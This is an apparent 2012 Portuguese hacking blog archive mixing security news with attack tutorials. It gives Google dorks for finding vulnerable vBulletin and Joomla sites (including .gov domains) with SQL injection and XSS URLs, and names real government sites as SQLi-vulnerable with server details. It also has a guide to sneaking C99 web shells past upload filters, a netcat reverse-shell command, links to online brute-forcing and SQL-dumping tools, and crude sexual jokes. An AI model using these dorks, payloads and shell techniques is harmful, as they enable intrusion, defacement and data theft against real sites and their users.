quarta-feira, 26 de setembro de 2012

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Aé vai o dork né!

Dork: site:domínio intext:"Powered By Vbulletin 4.1.12"
Ex:
site:ar intext:"Powered By Vbulletin 4.1.12"
site:br intext:"Powered By Vbulletin 4.1.12"
site:gov intext:"Powered By Vbulletin 4.1.12"

O domínio fica a sua preferencia.



Uso do exploit
 http://site/includes/blog_plugin_useradmin.php?do=usercss&u="SQL INJECTION"


Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting

Bug Joomla 2.5.6

Bug Joomla 2.5.6
Aviso: Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting
Autor: Stefan Schurtz
Software afetado: testado com sucesso em Joomla 2.5.6
URL Vendedor: http://www.joomla.org/

/*
==========================
Descrição vulnerabilidade
==========================

Com ativado "módulo de linguagem Switcher posição-4." (Extensões -> Módulos -> Gerenciador de Módulo: Módulo de Língua Switcher), XSS são possíveis.

==================
PoC-Exploit
==================*/

//Com o conteúdo de amostra padrão

*/
Dork de busca: inurl:/joomla/index.php/image-gallery/


http://[site]/joomla/index.php/image-gallery/">/25-koala
http://[site]/joomla/index.php/image-gallery/">
http://[site]/joomla/index.php/image-gallery/animals/25-">

=========
solução
=========

FAÇA Upgrade para a versão 2.5.7

Mais simples que comer xoxota nova hashahsa!


quinta-feira, 20 de setembro de 2012

Casa Rui Barbosa.gov vulnerável



Mais uma vez a equipe do INURL fazendo o seu trabalho.
 Foi constatado como vulnerável o site http://www.casaruibarbosa.gov.br a falha é simples Sqli, já entramos em contato com os responsáveis pelo site para alerta-los.

domingo, 16 de setembro de 2012

Tchê Linux


Neste Final de Semana (Sábado -15/09) rolou o Tchê Linux na cidade de Caxias do Sul, na Ftec (Faculdade de Tecnologia).
O Tche Linux,é basicamente Grupo de Usuários de Software Livre do Rio Grande do Sul, ou seja é um grupo de voluntários que preza pela ação social constante, trazendo o ideal participativo do desenvolvimento de Software Livre para o dia-a-dia dos profissionais, estudantes e interessados em tecnologias livres do estado, ao buscar continuamente a organização de eventos gratuitos e encontros informais para a discussão técnica e troca de experiências entre seus membros.

Fica aqui a dica do Google inurl team, Neste Link você poderá ter acesso as datas dos próximos eventos assim como  em qual cidade, ocorrerá.

sábado, 15 de setembro de 2012

Falha de segurança no site da Eletropaulo expõe dados dos seus clientes

Eletropaulo Uma falha de segurança descoberta nesta quarta-feira (5) no site da Eletropaulo, companhia energética que atende a região metropolitana de São Paulo, deixou os dados cadastrais dos mais de 6,4 milhões de usuários expostos. O problema foi encontrado pelo estudante de sistemas da informação Carlos Eduardo Santiago.
A falha permitia que qualquer pessoa tivesse acesso e conseguisse alterar os dados cadastrais e de pagamento dos clientes da companhia. Além disso, era possível acessar as últimas 13 faturas dos clientes e solicitar a suspensão do fornecimento de energia elétrica.
Home site Eletropaulo
A empresa informou que irá lançar um novo site em novembro
Santiago descobriu que para ter acesso aos dados dos clientes, bastava fazer uma simples modificação no endereço do site. Outro problema de segurança identificado é o fato de que para acessar os serviços da empresa pelo site, o usuários precisam apenas fornecer CPF ou CNPJ do cliente, dados estes que se encontram em qualquer conta.
E nesta quinta-feira (6), a Eletropaulo se pronunciou por meio de sua assessoria de imprensa afirmando que os problemas no site já foram resolvidos e, que até novembro, a empresa irá lançar uma nova página na internet. Esta foi a primeira vez que o site da empresa passou por problemas.

Fonte: http://canaltech.com.br/noticia/seguranca/Falha-de-seguranca-no-site-da-Eletropaulo-expoe-dados-dos-seus-clientes/#ixzz26ZgeWsZR
O conteúdo do Canaltech é protegido sob a licença Creative Commons (CC BY-NC-ND). Você pode reproduzi-lo, desde que insira créditos COM O LINK para o conteúdo original e não faça uso comercial de nossa produção.

Que tal um possivel novo milworm ?

Que tal um possivel novo milworm ?
OBS do site:
O arquivo final de explorações e de software vulnerável e um grande recurso para pesquisadores de vulnerabilidades e profissionais de segurança.O nosso objectivo é recolher façanhas de apresentar tals e listas de discussão diversas e concentrá-las em um, fácil de navegar banco de dados.Este foi escrito para fins educacionais. Use por sua conta e risco. Autor não será responsável por qualquer dano. / / R0073r

Site:http://www.1337day.com/

Ferramentas online para pentest.

Abaixo, você pode encontrar algumas ferramentas de teste on-line Penetração deitos por Subhash Dasyam:


Abaixo, você pode encontrar algumas ferramentas de teste on-line Penetração deitos por Subhash Dasyam:

Online Port Scanner

http://scan.subhashdasyam.com/port-scanner.php

Online VNC Scanner

http://scan.subhashdasyam.com/dumper-with-login.php

Online SSH Scanner

http://scan.subhashdasyam.com/ssh-scanner.php

Online Admin Page Bruter

http://scan.subhashdasyam.com/admin-page-finder.php

Online WordPress Admin/Password Bruter

http://scan.subhashdasyam.com/wordpress-bruter.php

Online LFI Scanner

http://scan.subhashdasyam.com/lfi-scanner.php

Online RDP Scanner

http://scan.subhashdasyam.com/remote-desktop-scanner.php

Fastest Online SQL Injection Values Dumper

http://scan.subhashdasyam.com/dumper.php

Fastest Online SQL Injection Values Dumper(Supports Login)
http://scan.subhashdasyam.com/dumper-with-login.php

quinta-feira, 13 de setembro de 2012

Site: www.consorciopirai.sp.gov.br com vulnerabilidade.

Site: http://www.consorciopirai.sp.gov.br/
Host IP: 186.202.156.2
Web Server: Apache
DB: consorciopirai
Falha: SQLI

Obs: A equip da GoogleInurl, já informo a falha ao admin do site.

"Procure aprender algo que você ainda não domina, caso o contrario você nunca crescerá"

terça-feira, 11 de setembro de 2012

Manual básico do NMAP

Manual básico do NMAP


=======================================================================================
Manual básico do NMAP
=======================================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
EBR Web Hacking - Sux w-rm - Darkside Group.
Brazilian underground groups :]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

Author: Samuz1n Colz1n
Contact: samuzin[at]hotmail.com.br
Thank`s: shadow vds e kernel
Greetz: ebr web hacking

-=[Descrição]=-

O Nmap fornece, de uma maneira geral, a relação de computadores e serviços
ativos. Este paper irá explicar como instalar e utilizar algumas funções do Nmap.

-=[Alguns métodos de Varredura]=-

-sP : (Ping Scan) Para saber se um determinado host ou rede está no ar. O nmap pode enviar pacotes ICMP (echo request) para verificar se determinado host ou rede está ativa. Hoje em dia, existem muitos filtros que rejeitam os pacotes ICMP, então ele retorna com um pacote de flag contendo TCP ACK para a porta 80(padrão) e caso receba um RST o alvo está ativo. A terceira técnica envia um pacote SYN ( Pedido de conexão) e espera um RST(resposta) ou um SYN-ACK.

Comentário : Podemos também usar o nmap para um ataque de negaça, usar o nmap para um "SYN FLOOD".

-sR : RCP Scan ! Ele considera todas as portas TCP e UDP abertas e envia comando NULL, para determinar se realmente são portas RPC. É como se o comando "rpcinfo -p" estivesse sendo utilizado, mesmo através de um firewall.

-sS : TCP SYN scan: Técnica também conhecida por "half-open" (no inglês, half é como se fosse meio ou meia.) pois não abre uma conexão TCP completa. É enviado um pacote SYN, como se ele fosse uma conexão real e aguarda uma resposta. Caso o pacote SYN-ACK seja recebido, a porta está aberta, enquanto um como resposta indica que a porta está fechada. A vantagem dessa abortagem é que poucos irão detectar esse scanning.

-sT : TCP connect scan: Técnica básica. É utilizada a chamada de sistema "connect" que envia um sinal de portas ativas. É um dos scans mais rápidos, porém fácil de ser detectado.

-sU :UDP scan: Scan para portas UDP, para saber qual está aberta. A técnica consiste em enviar um pacote UDP de 0 byte para cada porta do host. Se for recebido uma mensagem ICMP "port unreachable" então a porta está fechada, senão a porta PODE estar aberta.

-sV: Version detection, muito utilizada. Após as portas TCP e/ou UDP serem descobertas por algum dos métodos, o nmap irá determinar qual o serviço está rodando atualmente. O arquivo nmap-service-probes é utilizado para determinar tipos de protocolos, nome da aplicação, número da versão, etc.

-sF, -sX, -sN
Stealth FIN, Xmas Tree ou Null: Também técnica utilizada para flood. Alguns firewalls e filtros de pacotes detectam pacotes SYN's em portas restritas, então é necessário utilizar métodos avançados para atravessar esse firewall.

FIN : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas ignoram esses pacotes.
Xmas Tree : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas ignoram esse pacote FIN. O pacote contendo as flags FIN, URG e PUSH são utilizados no pacotes FIN que é enviado ao alvo.

Null : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas IGNORAM esses pacotes. Nenhuma flag é ligada no pacote FIN.


-=[Opções Gerais]=-

******************************************
OBS : Em alguns casos ignorar o "<>"
******************************************
-D :
Durante uma varredura, utiliza uma séria de endereços falsificados, simulando que o scanning tenha originado desses vários hosts, sendo praticamente impossível indentificar a verdadeira origem da varreduta.

Ex.: nmap -D IP1,IP2,IP3,IP4,IP6,127.1.1.1

-F : Procura pelas portas que estão no /etc/services. Método mais rápido, porém não procurar todas as portas.

Ex.: nmap -F

-I : Se o host estiver utilizando o ident, é possível identificar o dono dos serviços que estão sendo executados no servidor(trablha com a opção -sT )

Ex.: nmap --sT -i

-O: Ativa a identificação do host remoto via TCP/IP. Irá apresentar versão do Sistema Operacional e tempo ativo.

Ex.: nmap -O

-P : : Específica quas portas devem ser verificados na varredura>

Ex.: nmap -p 22,80,3306,21,8080,134


-T
Esse parâmetro seta a prioridade de varredura do Nmap:


-=[Alguns exemplos]=-

Ex.: nmap -v alvo
Esta opção faz a varredura de todas as portas TCP reservadas.

Ex.: nmap -sS -O alvo/24
Lança uma varredura TCP Syn contra cada máquina que está ativa, abrangendo todas as 255 máquinas de classe “C” onde alvo faz parte. Além disso determina o sistema operacional de cada host.

Ex.: nmap -sX -p 22,53,110,143 alvo
Envia uma varredura Xmas Tree para o alvo, além de varrer somente os serviços
de sshd, Dns, pop3d e imapd.

--=| FIM! |=--

sábado, 8 de setembro de 2012

Engenharia Reversa de Malware

Engenharia Reversa de Malware



Banker ou “banqueiro” representa uma nova modalidade de crime. Os Bankers utilizam meios para roubo de informações bancárias programando trojans e utilizando de quadrilhas para aplicar seus atos ilícitos, como saques, compras e transferências indevidas de conta bancária das vítimas. O aumento de ataques utilizando trojans que rouba dados está crescendo assustadoramente, logo devemos ficar a atentos aos mecanismos de defesas, como firewals, bem configurados, anti-virus e políticas de programação de software adequadas.

A linguagem de programação mais usada para o trojan criado pelos Bankers Brasileiros, conhecida como Keyllogers Bankers é a Borland Delphi e Microsoft Visual Basic. Estes trojans são espalhados geralmente em redes sociais, e-mails e downloads de arquivos. Segundo pesquisas o Brasil é líder em desenvolvimento deste tipo de trojans e existe um latente comercio da venda dos trojans com preços variados que passam de R$ 1.000,00. Portanto, todo tipo de informações relevantes capturadas na internet , como contas de usuários são comercializada pelas quadrilhas. Várias técnicas são aplicadas, como redirecionamento de sites, defacer, etc. Uma das maiores operações ao combate, desta modalidade de crime foi a famosa operação Cavalo de Tróia executada pela Polícia Federal,que prendeu mais de 50 Crackers em todo o Brasil.

Devido, ao constante desenvolvimento dos trojans, nada melhor que aplicarmos engenharia reversa, afim de entendermos a estrutura do trojan e seus modos operantes. Creio que só poderemos aplicar as melhores otimizações dissecando a estrutura binária do sistema malfeitor, de forma a compreender os pormenores da ferramenta analisada em amplitude.

Seque alguns vídeos que encontrei sobre engenharia reversa com trojan-banker apresentado no Hack’n Rio 2011, muito bem detalhado e vale a pena conferir.

Abraços a todos.

Assista os vídeos: Engenharia Reversa de Trojan-Banker

By: Gerson Raymond

Técnico em Contabilidade, Técnico em Eletrônica, Técnico em Telecomunicações, Bacharel em Ciência da Computação, Administrador de Redes Linux (CentOS, XEN, Zabbix, Asterisk/Elastix) e Pós-Graduando em Segurança em Tecnologia da Informação – UNIVERSIDADE MACKENZIE – SP.

Homepage: http://www.grsecurity.com.br

Os cibercriminosos usam a engenharia social para estender ciclo de vida de malware

Usuários de smartphones Android continuam a ser um alvo lucrativo como a plataforma tem actualmente 59 por cento do mercado global e está a caminho de ficar o sistema operacional mais enviados móvel até 2016, de acordo com a AVG.


Usuários de smartphones Android continuam a ser um alvo lucrativo como a plataforma tem actualmente 59 por cento do mercado global e está a caminho de ficar o sistema operacional mais enviados móvel até 2016, de acordo com a AVG.

Grande parte deste novo malware também foi identificado como originário da China e direcionada aos usuários de lá e em mercados vizinhos, refletindo o fato de que este é agora o mercado mais importante do mundo para smartphones, com mais de um milhão de usuários da web móvel.

A conexão China

Este quarto viu a introdução do bootkit primeiro Android, "DKFbootkit ', que se disfarça como uma versão falsa de uma aplicação legítima e danos código do smartphone kernel do Linux, substituindo-o com código malicioso. Os usuários são induzidos a clicar em 'OK' para as notificações que o malware oferece, dando-lhe permissão para adicionar-se a seqüência de inicialização e primavera na vida uma vez que o dispositivo é ativado.

No enraizamento do dispositivo, este ataque transforma o smartphone em um zumbi que está totalmente sob o cibercriminoso de controle, o que torna uma séria ameaça para os usuários do Android. Este ataque é espalhado sobre o terceiro mercado de aplicações partido - e não o jogo oficial do Google - na China.

Os autores de malware também spam China, Japão, Coréia do Sul, Taiwan e Estados Unidos, com mensagens de Trojan-infectados e-mail relacionados a questões políticas em torno do Tibete. Estes foram liberados na parte de trás de segurança do Microsoft 'Patch Tuesday' bulletin4 com os autores correndo para aproveitar a "janela de oportunidade" lapso de tempo entre o lançamento do patch e quando os usuários foram capazes de implementá-lo. O anexo de e-mail contém um arquivo executável, incorporado criptografado que recolhe informações sobre o usuário sensíveis, tais como senhas, e é capaz de baixar malware adicional para instalação de key logger ou para obter uma configuração de novo trojan.

Yuval Ben-Itzhak, CTO da AVG, disse: "Em nossa experiência, um sistema operacional atrai a atenção de criminosos, uma vez que assegura cinco partes por cento do mercado, uma vez que atinge 10 por cento, vai ser activamente atacado. Não é surpresa, portanto, que nossas investigações descobriram um aumento ainda mais no malware visando smartphones Android dada a sua popularidade sustentado, com novos ataques focados no enraizamento os dispositivos para dar cibercriminosos controle total. O que há de novo neste trimestre é o aumento significativo destas ameaças provenientes da China. "

O fim do antivírus?

Para todo o sensacionalismo em torno da descoberta do Stuxnet em 2010 e 2012 seu equivalente, Chama, o consumidor médio nunca foi realmente um alvo para qualquer malware. Enquanto rumores de ataques cibernéticos circularam sobre ambos, Chama não era realmente um patch da sofisticação do Stuxnet em termos de criação de malware e, em particular, as técnicas utilizadas na carga não foram muito impressionante. A indústria de segurança já está adaptado à natureza inesperada de ameaças com detecção de assinatura tradicional que é apenas uma camada dentro de uma solução de segurança multi-facetado.

Golpes de consumo

A versão mais recente da massa ataque de injeção de SQL LizaMoon neste trimestre engana os usuários a baixar um cavalo de tróia ou algum software não autorizado através da exploração de interesse humano e se escondendo dentro inexistentes vídeos de celebridades do sexo ou sites de antivírus falsos. Injetar código malicioso em sites legítimos, mas vulnerável, este ataque teve como alvo o Mozilla Firefox ® e navegador Internet Explorer da Microsoft com dois vetores de ataque.

No Firefox, os usuários são atraídos por vídeos picantes de socialite Paris Hilton e Emma Watson atriz e pediu para atualizar sua instalação do Flash, a fim de exibi-los. Os usuários nunca chegar a ver o vídeo como o malware instalado um Trojan disfarçado de atualização do Flash.

No Internet Explorer, os usuários recebem uma solicitação aparentemente de um site de antivírus que afirmam ter encontrado malware em seu computador. Eles são incentivados a fazer o download do malware e, uma vez instalado, para "comprá-lo", que seria, então, simplesmente remover o malware em troca de pagamento.

Caso a vítima decidir não comprar, nag telas que aparecer até o ladino foi removido da máquina. Na versão mais recente, o malware foi atualizado para permitir 'drive-by downloads ", onde as vítimas precisam apenas de visitar o site para ser infectado e ele não é mais o suficiente para fechar a página da web para ser seguro.

Rovio aplicação do "Espaço Angry Birds 'também foi linha de frente para golpes de consumo neste trimestre. Usando os mesmos gráficos que a versão de legítima, uma versão totalmente funcional Trojan-infectado foi carregado para lojas de aplicativos não oficiais Android. Ele usa o GingerBreak explorar a raiz do dispositivo, ganhando funcionalidade de Comando e Controle para comunicar com o servidor remoto para baixar e instalar malware adicional, funcionalidade botnet, e para permitir a modificação de arquivos e lançamento de URLs.

Fonte: http://www.net-security.org/malware_news.php?id=2199

segunda-feira, 3 de setembro de 2012

Shell em Imagens



Bom galera esse tuto visa mostrar como nós podemos burlar um upload de um site para hospedar uma Shell. Mas antes alguns pontos

Oque é uma Shell?

É o componente que faz a ligação entre o kernel e o usuário. Toda vez que o usuário digita um comando e pressiona |Enter|, a Shell interpreta os 
comandos e manda para o Kernel.

Mais informações Clique Aqui para ver sobre exploit,shell,root e outros

Oque farei com uma Shell hospedada?

Bom depende do tipo de Shell que você upar no site. Existem Shell’s que upam outras Shell( Você: lol p/ q isso. Eu: Calma eu já falo), existem Shell que te dão o controle do site inteiro, alguns para ler arquivos, outras para usar a máquina como zumbi enfim...
Lembrando que as Shells, podem ser em php,c...

E essas Shells são upadas naquele famoso link mais ou menos assim.



Problemas:

Ai que surge um problema. Porque muitos desses “uploads”, geralmente verificam a extensão do arquivo. Alguns não verificam então você pode upar uma página Shell.php e virar admin na página.Mas essa verificação por extensão é boa e ruim ao mesmo tempo, boa porque fornece uma falsa segurando pro web máster que fez, e ruim porque ele verifica o TIPO DE EXTENSÃO, e não o arquivo em Si. 

Como assim?

Posso upar uma Shell Php, porém com a extensão . JPG que ele aceitará, depois é só mudar de volta para .php e você tem o acesso.

Como Vencer essas barreiras então:

Simples, para saber o tipo de validação do campo, infelizmente é só testando mas por exemplo você pode ter uma Shell assim

CÓDIGO:
C99.jpg.php


Porque? Porque se ele aceitar, significa que o campo verifica apenas a primeira extensão depois de um “ . “ (ponto)

Assim mesmo ele sendo upado como uma jpeg, ele vai ser reconhecido pelo sistema como um Php assim você terá o acesso ao sistema, basta ir no site da vitima e no final por essa extensão upada ou seja.

CÓDIGO:
www.sitedavitima.com.br/c99.jpeg.php



Outros casos é ao contrário primeiro tem que vir a extensão, do pho e depois do jpeg por ele verifica até o final da informação depois do ponto.

Ai ficaria assim 

CÓDIGO:
C99.php.jpeg



Ai você tem que depois dar um jeito de mudar essa extensão usando um exploit por exemplo.



Um outro tipo é usando um é o que se pode anular a última extensão através de um comando null.

O arquivo renomeado ficaria assim:

CÓDIGO:
C99.php.jpg OU minhashell.jpg. php


O filtro iria aceitar o arquivo por ele ser uma extensão .jpg, porém como à um comando anulando a última extensão, então ele reconheceria o arquivo como .php e isso novamente te daria acesso adminsitrativo.

Dúvidas,perguntas e chorumelas estamos ae... Abraços

Entendendo Shell,root, exploit

Entendendo Shell,root, exploit 

 Olá a todos,sou o Adrian Lamo, estou me juntando ao Time do Google INURL e espero ajudar vocês!!! Como minha primeira matéria aqui trago uma básicão pra galera nova que está começando.



*****************
O que é Shell?
*****************

Shell não é aquele posto que tem em frente a sua casa, ou que você vai beber no Findi semana não. Uma Shell é um interpretador de comandos (interpreta os comandos inseridos pelo teclado), ou seja é o componente que faz a ligação entre o kernel e o usuário. Toda vez que o usuário digita um comando e pressiona |Enter|, a Shell interpreta os
comandos e manda para o Kernel.

Exemplo de Shell: C99

Tipos de Shell: Podem ser .txt ,.php, .gif...

************
Oque é Kernel
************

O Kernel é o centro do sistema operacional, sendo o componente que se comunica
diretamente com o hardware, sendo assim, precisa ser reescrito e compilado de acordo com a modificação da plataforma em questão . O Kernel compila e gerencia a requisiçãoseja usando memória, processador ou algum periférico.

**********************
Oque são Shell script?
********************** 

Shell scripts são conjuntos de comandos armazenados em um arquivo texto que são
executados seqüencialmente.

******************
[b]O que é um Exploit?
******************

Enquanto vocês leem isso,alguém deve estar pensando."Obaa vamos explodir quem???" Na verdade o Exploit é um programa que explora um bug em um software ou sistema
operacional específico. Na maioria das vezes,o exploit precisa estar rodando no mesmo ambiente para o qual ele foi projetado, depois que a compilação foi feita é só você o
rodar e obter o root.

******************
O que é root???
******************

root ,certamente não é o nome de sua vizinha gostosa,na verdade ele é o usuário que tem poder total sobre o sistema, ou seja,como o administrador no Windows ele pode
criar contas, excluir usuários, criar diretórios, etc.E com isso podemos fazer nosso
querio Deface...

**************
O que é Deface??
**************

Deixe seu site que eu lhe mostro haha..
Brincadeira, deface é o ato de desconfigurar, ou mesmo editar uma página.Para mais informações poderá
acessar a nossa parte de Deface aqui do Fórum, ou o meu Blog.

Link da Área Deface:

================
Esclarecimentos Finais
================

Espero que tenham gostado ai dessa dica,se gostaram clica no '+'
do tópico e add a minha reputação.Esse é um tuto básico,mas é pra isso que estamos aqui ensinar a galera que um dia vai nos substituir.. Abraços

Dúvidas, chorumelas, e outras coisitas podem pedir...

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja


Gottfrid Svartholm, o co-fundador de um dos maiores, se não maior, site de torrent do mundo, o The Pirate Bay foi preso durante o final de semana no Camboja, mais exatamente na cidade Phnom Penh.

Ele estava sendo procurado pela justiça sueca desde o mês Abril deste ano, quadno o mesmo não compareceu perante as autoridades para cumprir sua pena.

De acordo com a polícia cambojana, o pedido de prisão veio do governo sueco, porém, os países tem um tratado de extradição e precisarão analisar o caso para dar procedimento nesta ação.

Além de um ano de prisão, Svartholm e os outros três criadores do site, terão que pagar uma multa de 3,6 milhões de dólares.

Espero que este caso seja semelhante ao do Kim Dotcom, e que ele seja liberado em breve. Vale lembrar que o The Pirate Bay não compartilha arquivos, você apenas clica em um link magnético no qual vai baixar de outros usuários que estão compartilhando, ele te mostra o caminho, só isso.

http://thepiratebay.se/  ~~~:)

Fonte:http://nerdpride.com.br/Tecnologia/gottfrid-svartholm-co-fundador-do-site-the-pirate-bay-foi-preso-no-camboja/

domingo, 2 de setembro de 2012

Defenda-se do SQL injection Script

Defenda-se do SQL injection Script

Hoje com a grande necessita que o mercado tem de ficar online, até o tio da quitanda da esquina tem um website.
Mais com grande numero de profissionais e de trabalhos que existe vem a questão de segurança seu site é seguro?

As vezes me deparo com situações no de fato ridículas referente valorização do Professional.
Digamos Tem dois profissionais que trabalham com Webdesign:

1º Profissional -  Te garante Segurança no script,SEO,Administração do site.
       Entrega com prazo de 10 a 15 dias depois que o conteudo entregue.
       Valor: 1,500.
2º Profissional -  SEO,Administração do site.
        Entrega com prazo de 5 a 8 dias depois que o conteudo entregue.
       Valor: 800,50.

Logica: "Logo o cliente pensa pra que eu quero segurança no meu site, não preciso disso tudo sem falar que o preço do n2 ta melhor."

Informando "NÃO SEJA ESSE CARA"!
Da mesma forma que temos informações de como fazer uma receita de bolo na internet, podemos ter informações de como invadir seu site em questões de clicks.

Um vídeo abaixa demonstra bem o que é um simples invasão.
O video se trata de Blind SQL injection no final do post tem o link de um tutorial como se defender dele.

Tutorial Blind SQL Injection - 2012




Script Ant - SQL_Injection


Recomento ler essa matéria também  tutorial.
Fonte do vídeo:http://www.lucaspeperaio.com.br/blog/blind-sql-injection

Buscar informações com Google Hacking referente ao CEH.

Essa dork vai pra galera do Garoa grupo Paranoia Hacker.


Essa dork vai pra galera do Garoa grupo Paranoia Hacker.

Buscar informações com Google Hacking referente ao  CEH.

+"Hacker Ético Certificado" = Significa:  Forçar o Google pesquisar o determinado parâmetro,
Assim ele pesquisa  "Hacker Ético Certificado"   significa que o conteudo do arquivo deve ser português.
Esta entre aspas  "Texto" para o Google intender que queres buscar a frase da forma que esta,
Ex:  +"Luiz Inacio Lula da Silva" , as vezes ele pesquisa  "Luiz"  no começo da pagina  "Inácio"  no fim e
"da Silva" vem de uma propaganda da pagina, este é o segredo das  "" aspas duplas nas pesquisas.

  CEH = Da um complemento na pesquisa mais uma referencia para garantir o resultado.

ext:pdf  = Determinar a extensão que o Google vai pesquisa no formato .PDF

Dork: +"Hacker Ético Certificado" CEH ext:pdf
 Só basta copiar:   +"Hacker Ético Certificado" CEH ext:pdf
 Colar no Google.

Paranoia Hacker


Paranoia Hacker  é uma atividade do Garoa focado em promover o conhecimento em (in)segurança da informação, que visa apresentar conceitos básicos, técnicas de defesa, ferramentas e mostrando as nuances dos ataques, buscando assim fomentar o conhecimento de forma prática - inclusive pensando em promover competições práticas de "capture the flag".
Nesta atividade buscaremos abordar técnicas de desenvolvimento seguro, exploit writer entre outros conhecimentos relacionados como insights afins.
O Paranoia Hacker foi criado por entusiastas de segurança da informação, cujo objetivo em comum é o espírito de disseminação de conhecimento e de colaboração. Esperamos que você faça parte desse time, dessa seleção.
O grupo funcionará basicamente por atividades periódicas, incluindo palestras e oficinas práticas! Todas as atividades são gratuitas e abertas a todos os interessados. Também não é preciso conhecimento prévio de Segurança: os novatos são bem vindos. A menos se for indicado o contrário, não há necessidade de inscrição prévia, basta aparecer.


O grupo tem como o objetivo evoluir progressivamente visando uma estrutura lógica de aprendizagem e formação, mas buscando sempre aproveitar as oportunidades de colaboração e voluntários que se oferecerem para ministrar conteúdos pertinentes aos objetivos do grupo.
As atividades e encontros serão definidas e anunciadas nesta página, bem como na lista de discussão do Garoa com antecedência. Além do mais, qualquer pessoa que esteja interessada em difundir o conhecimento pode se oferecer para ministrar uma atividade.
As atividades serão realizadas geralmente nas quartas-feiras a noite ou aos sábados, dependendo da disponibilidade do pessoal, e vão durar cerca de 2 horas cada.Mas atenção: poderão haver exceções para os dias da semana.
O evento acontece na sede do Garoa Hacker Clube. Para saber como chegar, veja aqui.


Garoa do Hacker: https://garoa.net.br/wiki/Paranoia_Hacker

Usando Netcat obter um shell remoto por r3boot3rAX

Usando Netcat obter um shell remoto | por r3boot3rAX


+ - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - +
| Usando Netcat obter um shell remoto | por r3boot3rAX 
+ - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - +

Hoje vamos falar sobre uma ferramenta popular, chamado "Netcat",
Muitas vezes referido como o "canivete suíço das redes",
Netcat é uma ferramenta que os administradores podem usar para ler e escrever dados
TCP ou UDP através da rede. Além disso, é extremamente útil para a depuração de rede e de ensaio.

Netcat oferece vários usos interessantes. Por exemplo, você pode fazê-lo
Ouvir uma determinada porta e executar um programa. Para isso, use o seguinte:

$ netcat -v -l -p 10111 -e "/bin/cat /etc/motd"

Isto diz netcat para escutar na porta 10111. Quando há uma conexão, ele diz netcat para executar
"/bin/cat /etc/motd,"que basicamente exibe o conteúdo do arquivo /etc/motd e sai.

Você também pode configurar o netcat em uma máquina para escutar as conexões de entrada e executá-lo
Em uma máquina remota para se conectar à máquina local e servir-se de um shell bash. Por exemplo,
Em uma máquina local com um endereço IP de 192.168.5.10, você usaria o seguinte:

$ netcat -v -l -p 10111

Na máquina remota, você usaria:

$ netcat 192.168.5.10 10111 -e /bin/bash

Isto diz a instância netcat na máquina remota para conectar-se à instância netcat escutando na 192.168.5.10
E servir-se de um shell bash da máquina remota, que estará disponível na máquina local.
Usando o exemplo netcat em 192.168.5.10, você pode executar comandos shell no host remoto.

Texto traduzido.
Fonte:https://www.facebook.com/legions.united

Votação de lei que pune crimes digitais sai da pauta do Senado


O projeto de lei que tipifica e pune crimes eletrônicos teve sua votação excluída da pauta do Senado por não ter passado antes pela Comissão de Constituição e Justiça. Dois dias atrás, o PL 35/2012, também conhecido como ‘Lei Dieckman’, começou a sair do papel após ter sido aprovado pela Comissão de Comissão de Ciência, Tecnologia, Inovação, Comunicação e Informática (CCT). A proposta era que a votação fosse incluída extra pauta, com requerimento de urgência para o texto ser examinado com rapidez, o que não aconteceu.

A lei é um complemento criminal ao Marco Civil da Internet, legislação desenvolvida pelo próprio governo federal e que definirá direitos e deveres dos internautas brasileiros, devendo ser votada ainda em setembro. Na visão do projeto original de cibercrimes, os provedores de internet seriam obrigados a armazenar todos os logs (registros de atividades dos internautas) por pelo menos três anos, mas, como a nova lei não cita o tema, fica valendo o que será estipulado no Marco Civil (guarda de logs por um ano).

O texto aprovado prevê prisão de três meses a um ano para quem “devassar dispositivo informático alheio, conectado ou não a rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo, instalar vulnerabilidades ou obter vantagem ilícita". Mesma punição para quem "produz, oferece, distribui, vende ou difunde programa de computador com o intuito de permitir a invasão de computador alheio".

A pena será agravada – prisão de seis meses a dois anos – se a invasão resultar em obtenção de conteúdo de comunicações eletrônicas privadas, segredos comerciais e industriais e informações sigilosas. A punição aumenta de um terço à metade se o crime for praticado contra os presidentes dos três poderes (legislativo, executivo e judiciário) nos três níveis – federal, estadual e municipal. No caso de falsificação de documentos, como cartão de crédito e de débito, a pena é prisão de um a cinco anos e multa. 

Programa Dork Scanner Ver 2.0

Dork Scanner Ver 2.0
Feito em C#
Efetua suas busca por ums 4 tipos de Bot.
Já é composto por 3 arquivos txt já com dorks de pesquisa editáveis RFI,PHP,ASP

Programa Dork Scanner Ver 2.0
Programa feito por: p0!z0neR

Baixar: http://optimusolucoes.com.br/Scanner-Dorks-2.0.rar